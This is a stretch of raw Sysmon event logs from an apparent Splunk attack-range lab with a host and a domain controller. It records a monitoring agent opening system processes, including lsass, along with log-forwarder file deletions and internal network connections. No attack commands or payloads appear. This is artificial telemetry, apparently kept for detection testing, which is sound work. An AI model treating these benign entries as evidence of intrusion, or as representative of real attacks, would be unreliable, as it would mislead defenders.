12:28:42.605{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018360Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.593{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018359Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.584{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018358Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.566{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018357Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.560{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018356Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.554{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018355Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.547{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018354Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.545{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 23542300x800000000000000018353Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.410{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EB3A6BC3F84FB9D92B726E44149E724,SHA256=E5336DF37561501F3F545295471F67AEF192760E96C1C5A8FD00F5B2F285D016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:42.159{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE0B81C56EAB9F836F7D84FAC39DCABA,SHA256=00BB36D351921571BAE97823DE79354E967075EDE60B5F2B73EA5C2979FA602B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018385Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:43.591{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=430983F974BF68FBD48C94B21598984A,SHA256=87C666E898424DCC4A9D2DD514E6A8D4E25340BF362AC6D864A4EEC779DE1307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:43.259{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DEFF4F964C041391436CBDE58DBF60C,SHA256=2301500ACDBE4E174721DFD2CEF25701BADB85F6E6D057AA1C3204ACCE036BDF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018387Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:44.909{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C325E43990AE296D4284073DA54E94,SHA256=42F9F352FE3EA8BA5A9BF87B1A13AA853CC32EBCB8740B7AEF796A6FEEC75DEF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:44.978{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000046068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:42.479{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56451-false10.0.1.12-8000- 23542300x800000000000000046067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:44.457{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23C0F80B83245445026BF336D9E45821,SHA256=5E155492AD1DA92D86D185E282BF1801064BFA693D02268125489969859BBE39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018386Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.958{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50175-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018388Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:45.995{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13024BA614C26E36909CEFEF4C4DB42F,SHA256=A818F3E8FB3C9396A676D0FD3853609C722FC26278822544A8496F302093CB56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:45.659{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F51F0FCD414009CD36BB5E5BFD7C81F,SHA256=9772C764A3952CA4E779E3177F3AA4B92C60CDA26A55B0996BCF270AAA515637,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:46.752{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAF5B136D8B564002B389122F826D691,SHA256=10EAD2F59115F26CB7C9AF5C30D68045BB5F3211F26AAAC6EF54B8A0AF54A631,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:47.846{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AF61B6D9203234951D834A32D2A08C2,SHA256=353E8EA565A4A03F480E146D36FB04790E5EB09058CC2C538C2F8A89BC7D1B28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018389Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:47.091{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49FD3DDFD86D5074457F1560F8CE75EF,SHA256=9F36E26C0E99C906F40F2265CAADBA2A8C917AB3A4344DCA58B010A4C3CD0DC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:48.947{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8914E9D88B6C8DE5F83CC18A06CD9235,SHA256=7EEF3299A647CE71A6D6FB127F062F4E0878A793E0BB556415D53175CD551C6C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018390Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:48.165{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE73D048628FEE20D8DAB6DC4EFADC0D,SHA256=59774E267C5196DA44E57F36AB04BB404662ED0417546322D54AFA619D33FE4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018391Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:49.243{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8C954FEF0808CE0EC89FD2AFF11323B,SHA256=BFB3DFE812E3B18F44DDA895D0BFF8796912C5FE4BA4056616F2105FA4EEE997,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018393Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:48.961{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50176-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018392Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:50.333{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=510521DBB5D0C45E2E78D083C0342307,SHA256=38FFB582047669FF8223CAA5E2F6021F498C7D3EB50D1C93CFE581BF11AADAC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000046076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:48.498{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56452-false10.0.1.12-8000- 10341000x800000000000000046075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:50.561{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000046074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:50.046{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9F4DA67119F6891B546D7B16C93E4EC,SHA256=5BCFEDEF69C56F52FA4626CC57E28A8EED494C9A2388FD7A0EB5C90E85E127BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018394Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:51.411{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ECB7DAA17955862B2808FE9CADABA76,SHA256=AE6890648DAEBD6A94D9FB75EA85EBA49099A5BEE6EA33440F6D889B15DCC3ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.913{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.911{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.906{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.904{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.901{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.890{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.885{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.880{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.873{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 